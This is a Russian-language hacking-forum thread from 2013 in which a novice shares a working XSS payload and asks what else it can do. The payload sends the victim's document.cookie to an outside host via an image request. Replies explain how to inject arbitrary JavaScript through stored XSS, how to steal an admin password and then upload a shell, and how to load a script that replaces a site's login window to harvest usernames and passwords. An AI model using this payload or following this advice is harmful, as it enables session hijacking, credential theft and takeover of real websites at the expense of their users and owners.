HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.10.2013, 22:39
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами: 7002326

Репутация: 0
По умолчанию

Есть пассивная XSS, работает только с этим кодом:

Код:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?
 
Ответить с цитированием

  #2  
Старый 01.10.2013, 23:13
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от panfilov1991  
Можно ли загнать на сервер какого нибудь червя?
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
 
Ответить с цитированием

  #3  
Старый 01.10.2013, 23:22
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами: 7002326

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
Есть на примере активная XSS.

Где взять код который можно попробовать вшить?
 
Ответить с цитированием

  #4  
Старый 01.10.2013, 23:36
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от panfilov1991  
Есть на примере активная XSS.
Где взять код который можно попробовать вшить?
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.
 
Ответить с цитированием

  #5  
Старый 01.10.2013, 23:51
panfilov1991
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами: 7002326

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.
То что код можно вшить любой я понял, как это сделать я не понимаю!

подскажите пожалуйста!
 
Ответить с цитированием

  #6  
Старый 02.10.2013, 00:14
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от panfilov1991  
То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!
Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.
 
Ответить с цитированием

  #7  
Старый 02.10.2013, 00:16
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от panfilov1991  
как это сделать я не понимаю!
Выучить JS самому или заказать у кого-нибудь написание кода за деньги.

upd:

Пример того, что можно делать с пассивкой - /thread275417.html
 
Ответить с цитированием

  #8  
Старый 10.10.2013, 17:18
Enesey
Новичок
Регистрация: 10.05.2013
Сообщений: 11
С нами: 6846806

Репутация: 0
По умолчанию

Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?
 
Ответить с цитированием

  #9  
Старый 10.10.2013, 18:28
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
С нами: 8832539

Репутация: 0
По умолчанию

сделай js файл который подменит окно авторизации,

черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.